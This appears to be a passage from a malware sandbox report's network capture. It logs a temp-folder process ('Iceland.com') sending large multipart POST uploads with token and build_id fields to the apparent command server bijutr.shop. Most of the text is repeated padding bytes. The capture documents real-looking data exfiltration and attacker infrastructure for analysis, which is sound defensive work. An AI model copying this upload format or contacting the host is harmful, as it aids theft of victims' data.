2024-12-27 06:10:50 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:50 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:50 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:50 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:50 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:50 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:50 UTC	717	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:10:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-27 06:10:51 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50043	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:52 UTC	327	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----MYC2D2DJEKF37YU3WT2D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 6990993 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:10:52 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 59 43 32 44 32 44 4a 45 4b 46 33 37 59 55 33 57 54 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 4d 59 43 32 44 32 44 4a 45 4b 46 33 37 59 55 33 57 54 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 4d 59 43 32 44 32 44 4a 45 4b 46 33 37 59 55 33 57 54 32 44 0d 0a 43 6f 6e 74 Data Ascii: ------MYC2D2DJEKF37YU3WT2DContent-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------MYC2D2DJEKF37YU3WT2DContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------MYC2D2DJEKF37YU3WT2DCont
2024-12-27 06:10:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:11:00 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:10:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50048	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:53 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----YUAI5X4W47GV3EUS0HDT User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
